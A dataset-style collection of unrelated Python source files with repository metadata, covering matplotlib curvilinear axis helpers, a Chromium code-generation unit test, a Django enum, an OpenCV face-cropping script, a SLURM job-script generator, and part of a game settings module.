elif coord_number in [0, 1]:
self.nth_coord_ticks = coord_number
else:
raise Exception("wrong coord number")
def get_tick_transform(self, axes):
return axes.transData
def get_tick_iterators(self, axes):
"""tick_loc, tick_angle, tick_label"""
g = self.grid_helper
if self._limits_inverted:
side = {"left": "right", "right": "left",
"top": "bottom", "bottom": "top"}[self.side]
else:
side = self.side
ti1 = g.get_tick_iterator(self.nth_coord_ticks, side)
ti2 = g.get_tick_iterator(1-self.nth_coord_ticks, side, minor=True)
return chain(ti1, ti2), iter([])
class FloatingAxisArtistHelper(AxisArtistHelper.Floating):
def __init__(self, grid_helper, nth_coord, value, axis_direction=None):
"""
nth_coord = along which coordinate value varies.
nth_coord = 0 -> x axis, nth_coord = 1 -> y axis
"""
super().__init__(nth_coord, value)
self.value = value
self.grid_helper = grid_helper
self._extremes = -np.inf, np.inf
self._get_line_path = None # a method that returns a Path.
self._line_num_points = 100 # number of points to create a line
def set_extremes(self, e1, e2):
if e1 is None:
e1 = -np.inf
if e2 is None:
e2 = np.inf
self._extremes = e1, e2
def update_lim(self, axes):
self.grid_helper.update_lim(axes)
x1, x2 = axes.get_xlim()
y1, y2 = axes.get_ylim()
grid_finder = self.grid_helper.grid_finder
extremes = grid_finder.extreme_finder(grid_finder.inv_transform_xy,
x1, y1, x2, y2)
lon_min, lon_max, lat_min, lat_max = extremes
e_min, e_max = self._extremes # ranges of other coordinates
if self.nth_coord == 0:
lat_min = max(e_min, lat_min)
lat_max = min(e_max, lat_max)
elif self.nth_coord == 1:
lon_min = max(e_min, lon_min)
lon_max = min(e_max, lon_max)
lon_levs, lon_n, lon_factor = \
grid_finder.grid_locator1(lon_min, lon_max)
lat_levs, lat_n, lat_factor = \
grid_finder.grid_locator2(lat_min, lat_max)
if self.nth_coord == 0:
xx0 = np.full(self._line_num_points, self.value, type(self.value))
yy0 = np.linspace(lat_min, lat_max, self._line_num_points)
xx, yy = grid_finder.transform_xy(xx0, yy0)
elif self.nth_coord == 1:
xx0 = np.linspace(lon_min, lon_max, self._line_num_points)
yy0 = np.full(self._line_num_points, self.value, type(self.value))
xx, yy = grid_finder.transform_xy(xx0, yy0)
self.grid_info = {
"extremes": (lon_min, lon_max, lat_min, lat_max),
"lon_info": (lon_levs, lon_n, _deprecate_factor_none(lon_factor)),
"lat_info": (lat_levs, lat_n, _deprecate_factor_none(lat_factor)),
"lon_labels": grid_finder.tick_formatter1(
"bottom", _deprecate_factor_none(lon_factor), lon_levs),
"lat_labels": grid_finder.tick_formatter2(
"bottom", _deprecate_factor_none(lat_factor), lat_levs),
"line_xy": (xx, yy),
}
def get_axislabel_transform(self, axes):
return Affine2D() # axes.transData
def get_axislabel_pos_angle(self, axes):
extremes = self.grid_info["extremes"]
if self.nth_coord == 0:
xx0 = self.value
yy0 = (extremes[2] + extremes[3]) / 2
dxx = 0
dyy = abs(extremes[2] - extremes[3]) / 1000
elif self.nth_coord == 1:
xx0 = (extremes[0] + extremes[1]) / 2
yy0 = self.value
dxx = abs(extremes[0] - extremes[1]) / 1000
dyy = 0
grid_finder = self.grid_helper.grid_finder
(xx1,), (yy1,) = grid_finder.transform_xy([xx0], [yy0])
data_to_axes = axes.transData - axes.transAxes
p = data_to_axes.transform([xx1, yy1])
if 0 <= p[0] <= 1 and 0 <= p[1] <= 1:
xx1c, yy1c = axes.transData.transform([xx1, yy1])
(xx2,), (yy2,) = grid_finder.transform_xy([xx0 + dxx], [yy0 + dyy])
xx2c, yy2c = axes.transData.transform([xx2, yy2])
return (xx1c, yy1c), np.rad2deg(np.arctan2(yy2c-yy1c, xx2c-xx1c))
else:
return None, None
def get_tick_transform(self, axes):
return IdentityTransform() # axes.transData
def get_tick_iterators(self, axes):
"""tick_loc, tick_angle, tick_label, (optionally) tick_label"""
grid_finder = self.grid_helper.grid_finder
lat_levs, lat_n, lat_factor = self.grid_info["lat_info"]
lat_levs = np.asarray(lat_levs)
yy0 = lat_levs / _deprecate_factor_none(lat_factor)
dy = 0.01 / _deprecate_factor_none(lat_factor)
lon_levs, lon_n, lon_factor = self.grid_info["lon_info"]
lon_levs = np.asarray(lon_levs)
xx0 = lon_levs / _deprecate_factor_none(lon_factor)
dx = 0.01 / _deprecate_factor_none(lon_factor)
if None in self._extremes:
e0, e1 = self._extremes
else:
e0, e1 = sorted(self._extremes)
if e0 is None:
e0 = -np.inf
if e1 is None:
e1 = np.inf
if self.nth_coord == 0:
mask = (e0 <= yy0) & (yy0 <= e1)
#xx0, yy0 = xx0[mask], yy0[mask]
yy0 = yy0[mask]
elif self.nth_coord == 1:
mask = (e0 <= xx0) & (xx0 <= e1)
#xx0, yy0 = xx0[mask], yy0[mask]
xx0 = xx0[mask]
def transform_xy(x, y):
x1, y1 = grid_finder.transform_xy(x, y)
x2y2 = axes.transData.transform(np.array([x1, y1]).transpose())
x2, y2 = x2y2.transpose()
return x2, y2
# find angles
if self.nth_coord == 0:
xx0 = np.full_like(yy0, self.value)
xx1, yy1 = transform_xy(xx0, yy0)
xx00 = xx0.copy()
xx00[xx0 + dx > e1] -= dx
xx1a, yy1a = transform_xy(xx00, yy0)
xx1b, yy1b = transform_xy(xx00+dx, yy0)
xx2a, yy2a = transform_xy(xx0, yy0)
xx2b, yy2b = transform_xy(xx0, yy0+dy)
labels = self.grid_info["lat_labels"]
labels = [l for l, m in zip(labels, mask) if m]
elif self.nth_coord == 1:
yy0 = np.full_like(xx0, self.value)
xx1, yy1 = transform_xy(xx0, yy0)
xx1a, yy1a = transform_xy(xx0, yy0)
xx1b, yy1b = transform_xy(xx0, yy0+dy)
xx00 = xx0.copy()
xx00[xx0 + dx > e1] -= dx
xx2a, yy2a = transform_xy(xx00, yy0)
xx2b, yy2b = transform_xy(xx00+dx, yy0)
labels = self.grid_info["lon_labels"]
labels = [l for l, m in zip(labels, mask) if m]
def f1():
dd = np.arctan2(yy1b-yy1a, xx1b-xx1a) # angle normal
dd2 = np.arctan2(yy2b-yy2a, xx2b-xx2a) # angle tangent
mm = (yy1b == yy1a) & (xx1b == xx1a) # mask where dd not defined
dd[mm] = dd2[mm] + np.pi / 2
tick_to_axes = self.get_tick_transform(axes) - axes.transAxes
for x, y, d, d2, lab in zip(xx1, yy1, dd, dd2, labels):
c2 = tick_to_axes.transform((x, y))
delta = 0.00001
if 0-delta <= c2[0] <= 1+delta and 0-delta <= c2[1] <= 1+delta:
d1, d2 = np.rad2deg([d, d2])
yield [x, y], d1, d2, lab
return f1(), iter([])
def get_line_transform(self, axes):
return axes.transData
def get_line(self, axes):
self.update_lim(axes)
x, y = self.grid_info["line_xy"]
if self._get_line_path is None:
return Path(np.column_stack([x, y]))
else:
return self._get_line_path(axes, x, y)
class GridHelperCurveLinear(GridHelperBase):
def __init__(self, aux_trans,
extreme_finder=None,
grid_locator1=None,
grid_locator2=None,
tick_formatter1=None,
tick_formatter2=None):
"""
aux_trans : a transform from the source (curved) coordinate to
target (rectilinear) coordinate. An instance of MPL's Transform
(inverse transform should be defined) or a tuple of two callable
objects which defines the transform and its inverse. The callables
need take two arguments of array of source coordinates and
should return two target coordinates.
e.g., ``x2, y2 = trans(x1, y1)``
"""
super().__init__()
self.grid_info = None
self._old_values = None
self._aux_trans = aux_trans
self.grid_finder = GridFinder(aux_trans,
extreme_finder,
grid_locator1,
grid_locator2,
tick_formatter1,
tick_formatter2)
def update_grid_finder(self, aux_trans=None, **kw):
if aux_trans is not None:
self.grid_finder.update_transform(aux_trans)
self.grid_finder.update(**kw)
self.invalidate()
def _update(self, x1, x2, y1, y2):
"bbox in 0-based image coordinates"
# update wcsgrid
if self.valid() and self._old_values == (x1, x2, y1, y2):
return
self._update_grid(x1, y1, x2, y2)
self._old_values = (x1, x2, y1, y2)
self._force_update = False
def new_fixed_axis(self, loc,
nth_coord=None,
axis_direction=None,
offset=None,
axes=None):
if axes is None:
axes = self.axes
if axis_direction is None:
axis_direction = loc
_helper = FixedAxisArtistHelper(self, loc, nth_coord_ticks=nth_coord)
axisline = AxisArtist(axes, _helper, axis_direction=axis_direction)
# Why is clip not set on axisline, unlike in new_floating_axis or in
# the floating_axig.GridHelperCurveLinear subclass?
return axisline
def new_floating_axis(self, nth_coord,
value,
axes=None,
axis_direction="bottom"
):
if axes is None:
axes = self.axes
_helper = FloatingAxisArtistHelper(
self, nth_coord, value, axis_direction)
axisline = AxisArtist(axes, _helper)
# _helper = FloatingAxisArtistHelper(self, nth_coord,
# value,
# label_direction=label_direction,
# )
# axisline = AxisArtistFloating(axes, _helper,
# axis_direction=axis_direction)
axisline.line.set_clip_on(True)
axisline.line.set_clip_box(axisline.axes.bbox)
# axisline.major_ticklabels.set_visible(True)
# axisline.minor_ticklabels.set_visible(False)
# axisline.major_ticklabels.set_rotate_along_line(True)
# axisline.set_rotate_label_along_line(True)
return axisline
def _update_grid(self, x1, y1, x2, y2):
self.grid_info = self.grid_finder.get_grid_info(x1, y1, x2, y2)
def get_gridlines(self, which="major", axis="both"):
grid_lines = []
if axis in ["both", "x"]:
for gl in self.grid_info["lon"]["lines"]:
grid_lines.extend(gl)
if axis in ["both", "y"]:
for gl in self.grid_info["lat"]["lines"]:
grid_lines.extend(gl)
return grid_lines
def get_tick_iterator(self, nth_coord, axis_side, minor=False):
# axisnr = dict(left=0, bottom=1, right=2, top=3)[axis_side]
angle_tangent = dict(left=90, right=90, bottom=0, top=0)[axis_side]
# angle = [0, 90, 180, 270][axisnr]
lon_or_lat = ["lon", "lat"][nth_coord]
if not minor: # major ticks
for (xy, a), l in zip(
self.grid_info[lon_or_lat]["tick_locs"][axis_side],
self.grid_info[lon_or_lat]["tick_labels"][axis_side]):
angle_normal = a
yield xy, angle_normal, angle_tangent, l
else:
for (xy, a), l in zip(
self.grid_info[lon_or_lat]["tick_locs"][axis_side],
self.grid_info[lon_or_lat]["tick_labels"][axis_side]):
angle_normal = a
yield xy, angle_normal, angle_tangent, ""
# for xy, a, l in self.grid_info[lon_or_lat]["ticks"][axis_side]:
# yield xy, a, ""
| [
"kitae.yoon@deliveryhero.co.kr"
] | kitae.yoon@deliveryhero.co.kr |
2d5720190dc89d57eaf284a81c58774922bfc172 | 896b5a6aab6cb6c1e3ee2e59aad0128226471871 | /third_party/blink/renderer/bindings/scripts/bind_gen/code_node_test.py | 2b8c7c82ad64f97f787868ffd7237cee89a8def7 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | bkueppers/chromium | 86f09d32b7cb418f431b3b01a00ffe018e24de32 | d160b8b58d58120a9b2331671d0bda228d469482 | refs/heads/master | 2023-03-14T10:41:52.563439 | 2019-11-08T13:33:40 | 2019-11-08T13:33:40 | 219,389,734 | 0 | 0 | BSD-3-Clause | 2019-11-04T01:05:37 | 2019-11-04T01:05:37 | null | UTF-8 | Python | false | false | 9,142 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from .code_node import FunctionDefinitionNode
from .code_node import LikelyExitNode
from .code_node import LiteralNode
from .code_node import SequenceNode
from .code_node import SymbolNode
from .code_node import SymbolScopeNode
from .code_node import TextNode
from .code_node import UnlikelyExitNode
from .mako_renderer import MakoRenderer
class CodeNodeTest(unittest.TestCase):
def render(self, node):
prev = ""
current = str(node)
while current != prev:
prev = current
current = str(node)
return current
def assertRenderResult(self, node, expected):
def simplify(text):
return "\n".join(
[" ".join(line.split()) for line in text.split("\n")])
actual = simplify(self.render(node))
expected = simplify(expected)
self.assertEqual(actual, expected)
def test_literal_node(self):
"""
Tests that, in LiteralNode, the special characters of template (%, ${},
etc) are not processed.
"""
renderer = MakoRenderer()
root = LiteralNode("<% x = 42 %>${x}", renderer=renderer)
self.assertRenderResult(root, "<% x = 42 %>${x}")
def test_empty_literal_node(self):
renderer = MakoRenderer()
root = LiteralNode("", renderer=renderer)
self.assertRenderResult(root, "")
def test_text_node(self):
"""Tests that the template language works in TextNode."""
renderer = MakoRenderer()
root = TextNode("<% x = 42 %>${x}", renderer=renderer)
self.assertRenderResult(root, "42")
def test_empty_text_node(self):
renderer = MakoRenderer()
root = TextNode("", renderer=renderer)
self.assertRenderResult(root, "")
def test_list_operations_of_sequence_node(self):
"""
Tests that list operations (insert, append, and extend) of SequenceNode
work just same as Python built-in list.
"""
renderer = MakoRenderer()
root = SequenceNode(separator=",", renderer=renderer)
root.extend([
LiteralNode("2"),
LiteralNode("4"),
])
root.insert(1, LiteralNode("3"))
root.insert(0, LiteralNode("1"))
root.insert(100, LiteralNode("5"))
root.append(LiteralNode("6"))
self.assertRenderResult(root, "1,2,3,4,5,6")
root.remove(root[0])
root.remove(root[2])
root.remove(root[-1])
self.assertRenderResult(root, "2,3,5")
def test_nested_sequence(self):
"""Tests nested SequenceNodes."""
renderer = MakoRenderer()
root = SequenceNode(separator=",", renderer=renderer)
nested = SequenceNode(separator=",")
nested.extend([
LiteralNode("2"),
LiteralNode("3"),
LiteralNode("4"),
])
root.extend([
LiteralNode("1"),
nested,
LiteralNode("5"),
])
self.assertRenderResult(root, "1,2,3,4,5")
def test_symbol_definition_chains(self):
"""
Tests that use of SymbolNode inserts necessary SymbolDefinitionNode
appropriately.
"""
renderer = MakoRenderer()
root = SymbolScopeNode(separator_last="\n", renderer=renderer)
root.register_code_symbols([
SymbolNode("var1", "int ${var1} = ${var2} + ${var3};"),
SymbolNode("var2", "int ${var2} = ${var5};"),
SymbolNode("var3", "int ${var3} = ${var4};"),
SymbolNode("var4", "int ${var4} = 1;"),
SymbolNode("var5", "int ${var5} = 2;"),
])
root.append(TextNode("(void)${var1};"))
self.assertRenderResult(
root, """\
int var5 = 2;
int var2 = var5;
int var4 = 1;
int var3 = var4;
int var1 = var2 + var3;
(void)var1;
""")
def test_symbol_definition_with_exit_branches(self):
renderer = MakoRenderer()
root = SymbolScopeNode(separator_last="\n", renderer=renderer)
root.register_code_symbols([
SymbolNode("var1", "int ${var1} = 1;"),
SymbolNode("var2", "int ${var2} = 2;"),
SymbolNode("var3", "int ${var3} = 3;"),
SymbolNode("var4", "int ${var4} = 4;"),
SymbolNode("var5", "int ${var5} = 5;"),
SymbolNode("var6", "int ${var6} = 6;"),
])
root.extend([
TextNode("${var1};"),
UnlikelyExitNode(
cond=TextNode("${var2}"),
body=SymbolScopeNode([
TextNode("${var3};"),
TextNode("return ${var4};"),
])),
LikelyExitNode(
cond=TextNode("${var5}"),
body=SymbolScopeNode([
TextNode("return ${var6};"),
])),
TextNode("${var3};"),
])
self.assertRenderResult(
root, """\
int var1 = 1;
var1;
int var2 = 2;
int var3 = 3;
if (var2) {
var3;
int var4 = 4;
return var4;
}
int var5 = 5;
if (var5) {
int var6 = 6;
return var6;
}
var3;
""")
def test_symbol_definition_with_nested_exit_branches(self):
renderer = MakoRenderer()
root = SymbolScopeNode(separator_last="\n", renderer=renderer)
root.register_code_symbols([
SymbolNode("var1", "int ${var1} = 1;"),
SymbolNode("var2", "int ${var2} = 2;"),
SymbolNode("var3", "int ${var3} = 3;"),
SymbolNode("var4", "int ${var4} = 4;"),
SymbolNode("var5", "int ${var5} = 5;"),
SymbolNode("var6", "int ${var6} = 6;"),
])
root.extend([
UnlikelyExitNode(
cond=LiteralNode("false"),
body=SymbolScopeNode([
UnlikelyExitNode(
cond=LiteralNode("false"),
body=SymbolScopeNode([
TextNode("return ${var1};"),
])),
LiteralNode("return;"),
])),
LikelyExitNode(
cond=LiteralNode("true"),
body=SymbolScopeNode([
LikelyExitNode(
cond=LiteralNode("true"),
body=SymbolScopeNode([
TextNode("return ${var2};"),
])),
LiteralNode("return;"),
])),
])
self.assertRenderResult(
root, """\
if (false) {
if (false) {
int var1 = 1;
return var1;
}
return;
}
if (true) {
if (true) {
int var2 = 2;
return var2;
}
return;
}
""")
def test_function_definition_minimum(self):
renderer = MakoRenderer()
root = SymbolScopeNode(separator_last="\n", renderer=renderer)
root.append(
FunctionDefinitionNode(
name=LiteralNode("blink::bindings::func"),
arg_decls=[],
return_type=LiteralNode("void")))
self.assertRenderResult(root, """\
void blink::bindings::func() {
}
""")
def test_function_definition_full(self):
renderer = MakoRenderer()
root = SymbolScopeNode(separator_last="\n", renderer=renderer)
local_vars = [
SymbolNode("var1", "int ${var1} = 1;"),
SymbolNode("var2", "int ${var2} = 2;"),
]
func_body = SymbolScopeNode([
UnlikelyExitNode(
cond=TextNode("${var1}"),
body=SymbolScopeNode([TextNode("return ${var1};")])),
TextNode("return ${var2};"),
])
root.append(
FunctionDefinitionNode(
name=LiteralNode("blink::bindings::func"),
arg_decls=[LiteralNode("int arg1"),
LiteralNode("int arg2")],
return_type=LiteralNode("void"),
local_vars=local_vars,
body=func_body,
comment=LiteralNode("// comment1\n// comment2")))
self.assertRenderResult(
root, """\
// comment1
// comment2
void blink::bindings::func(int arg1, int arg2) {
int var1 = 1;
if (var1) {
return var1;
}
int var2 = 2;
return var2;
}
""")
def test_template_error_handling(self):
renderer = MakoRenderer()
root = SymbolScopeNode(renderer=renderer)
root.append(
SymbolScopeNode([
# Have Mako raise a NameError.
TextNode("${unbound_symbol}"),
]))
with self.assertRaises(NameError):
root.render()
callers_on_error = list(renderer.callers_on_error)
self.assertEqual(len(callers_on_error), 3)
self.assertEqual(callers_on_error[0], root[0][0])
self.assertEqual(callers_on_error[1], root[0])
self.assertEqual(callers_on_error[2], root)
self.assertEqual(renderer.last_caller_on_error, root[0][0])
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
db4906b126e1ee3ff257b3bb20c776ab64d9a31b | 90ec9a009d84dd7eebbd93de4f4b9de553326a39 | /app/config/enums.py | a558f22c18fe955f066b40058f21e00a46fa4fc0 | [] | no_license | alexiuasse/NipponArDjango | 18a86bb108b9d72b36c8adf7c4344398cc4ca6b2 | ddc541a8d7e4428bde63c56f44354d6f82e0f40d | refs/heads/master | 2023-08-03T12:16:56.431870 | 2021-07-15T23:43:33 | 2021-07-15T23:43:33 | 278,093,323 | 0 | 0 | null | 2021-09-22T20:04:15 | 2020-07-08T13:13:22 | CSS | UTF-8 | Python | false | false | 391 | py | # Created by Alex Matos Iuasse.
# Copyright (c) 2020. All rights reserved.
# Last modified 10/08/2020 10:14.
from enum import Enum
class ContextualEnum(Enum):
VERDE = "success"
AZUL = "primary"
CIANO = "info"
AMARELO = "warning"
VERMELHO = "danger"
CINZA = "default"
@classmethod
def choices(cls):
return [(key.value, key.name) for key in cls]
| [
"alexiuasse@gmail.com"
] | alexiuasse@gmail.com |
8c91a1c95584126d62eb15a000e7d8c552c05140 | 60aee65d7d40f2886a4c15e08e50f145c809aff6 | /experiment/Keras Machine Learning Model/function/imgCrop.py | 419986e7616c7aa5477d0e5bd51844dd9b815006 | [] | no_license | tshahria/DreamCatcher | 2fdabd90add46eb86a20fe1aa1b5bb4d4a58ddb1 | 3880b120f8ed857462d565fbf48d320076bff73a | refs/heads/master | 2021-05-06T10:19:18.634656 | 2017-12-08T20:31:44 | 2017-12-08T20:31:44 | 114,164,133 | 0 | 1 | null | 2017-12-13T20:09:44 | 2017-12-13T20:09:43 | null | UTF-8 | Python | false | false | 2,849 | py | import sys
from PIL import Image, ImageDraw
try:
import cv2 as cv
except ImportError:
print('Could not import cv, trying opencv')
import opencv.cv as cv
def main():
source_image = Image.open('function/ppl.jpg')
source_width, source_height = source_image.size
print('Image is {}x{}'.format(source_width, source_height))
target_width = 1000
target_height = 200
# Make image a reasonable size to work with. Using the source_height will
# make sure it's just resized to the target_width
source_image.thumbnail((target_width, source_height), Image.ANTIALIAS)
# Find the faces and show us where they are
faces = faces_from_pil_image(source_image)
faces_found_image = draw_faces(source_image, faces)
faces_found_image.show()
# Get details about where the faces are so we can crop
top_of_faces = top_face_top(faces)
bottom_of_faces = bottom_face_bottom(faces)
all_faces_height = bottom_of_faces - top_of_faces
print('Faces are {} pixels high'.format(all_faces_height))
if all_faces_height >= target_width:
print('Faces take up more than the final image, you need better logic')
exit_code = 1
else:
# Figure out where to crop and show the results
face_buffer = 0.5 * (target_height - all_faces_height)
top_of_crop = int(top_of_faces - face_buffer)
coords = (0, top_of_crop, target_width, top_of_crop + target_height)
print('Cropping to', coords)
final_image = source_image.crop(coords)
final_image.show()
exit_code = 0
return exit_code
def faces_from_pil_image(pil_image):
"Return a list of (x,y,h,w) tuples for faces detected in the PIL image"
storage = cv.CreateMemStorage(0)
facial_features = cv.Load('haarcascade_frontalface_alt.xml', storage=storage)
cv_im = cv.CreateImageHeader(pil_image.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cv_im, pil_image.tostring())
faces = cv.HaarDetectObjects(cv_im, facial_features, storage)
# faces includes a `neighbors` field that we aren't going to use here
return [f[0] for f in faces]
def top_face_top(faces):
coords = [f[1] for f in faces]
# Top left corner is 0,0 so we need the min for highest face
return min(coords)
def bottom_face_bottom(faces):
# Top left corner is 0,0 so we need the max for lowest face. Also add the
# height of the faces so that we get the bottom of it
coords = [f[1] + f[3] for f in faces]
return max(coords)
def draw_faces(image_, faces):
"Draw a rectangle around each face discovered"
image = image_.copy()
drawable = ImageDraw.Draw(image)
for x, y, w, h in faces:
absolute_coords = (x, y, x + w, y + h)
drawable.rectangle(absolute_coords)
return image
if __name__ == '__main__':
sys.exit(main()) | [
"jeffreykam0415@gmail.com"
] | jeffreykam0415@gmail.com |
dfb78191a7e2e45e05ba8a63e31ddffa103108f6 | 504efba4ab5ba1721ab3388144b16fa5f24833e7 | /07_Chroma_Scan_SC_NoRF/01_05/Make_SLURM_submission_script.py | 884a2e4ed4160053f6c9bacba40ba1044ad8a6a7 | [
"MIT"
] | permissive | HaroonRafique/PS_Transfer | b568fe41c98357877c3bc63b2ca89f8724439da0 | 59ed8a0978ba4699f34c9f7a2500e0026759a2b6 | refs/heads/master | 2023-05-25T21:13:36.586605 | 2020-07-10T07:41:40 | 2020-07-10T07:41:40 | 213,405,455 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,317 | py | #!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '05_01_05'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
| [
"haroon.rafique@protonmail.com"
] | haroon.rafique@protonmail.com |
e4da44a87446e6be726c46a697a1b2f50bba2bff | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve-8.51.857815/carbonui/util/settings.py | 9ec58d3fedc0bf851a67f8bbbabc77cf1a491343 | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,146 | py | #Embedded file name: carbonui/util\settings.py
"""
Does persisted settings with last-accessed cache feature and such.
"""
import blue
import os
from carbonui.util.bunch import Bunch
import defaultsetting
import types
import yaml
import traceback
import uthread
from carbon.common.script.util.timerstuff import AutoTimer
from carbonui.util.various_unsorted import GetAttrs
import log
class SettingSection:
"""
Binary settings file handling
"""
def __init__(self, name, filepath, autoStoreInterval, service):
self._name = name
self._filepath = filepath
self._dirty = False
self._service = service
self.datastore = {}
self.LoadFromFile(filepath, autoStoreInterval)
def __str__(self):
return '%s\nSetting section, %s; holding %s groups.\nFileLocation: %s' % ('-' * 60,
self._name,
len(self.datastore),
repr(self._filepath))
def __repr__(self):
s = self.__str__() + '\n'
for groupName, groupValue in self.datastore.iteritems():
s += '%s:\n' % groupName
for settingName, settingValue in groupValue.iteritems():
s += ' %s: %s\n' % (settingName, settingValue)
return s
class Group(dict):
"""
Wrapper class to make groups more accessible within setting sections
"""
def __init__(self, name, section):
self.__dict__['name'] = name
self.__dict__['section'] = section
def __getattr__(self, attrName):
if hasattr(self, 'section'):
return self.section.Get(self.name, attrName)
def Get(self, attrName, defValue = None):
retVal = self.__getattr__(attrName)
if retVal is None:
return defValue
return retVal
def __setattr__(self, attrName, value):
if hasattr(self, 'section'):
self.section.Set(self.name, attrName, value)
Set = __setattr__
def Release(self):
self.section = None
def HasKey(self, attrName):
return self.section.HasKey(self.name, attrName)
def Delete(self, attrName):
self.section.Delete(self.name, attrName)
def GetValues(self):
return self.section.GetValues(self.name)
def LoadFromFile(self, filepath, autoStoreInterval):
data = None
try:
fn = blue.paths.ResolvePath(filepath)
data = blue.win32.AtomicFileRead(fn)
except:
pass
if data and data[0]:
try:
self.datastore = blue.marshal.Load(data[0])
for k, v in self.datastore.iteritems():
self.CreateGroup(k)
except:
log.LogError('Error loading settings data file--', str(self))
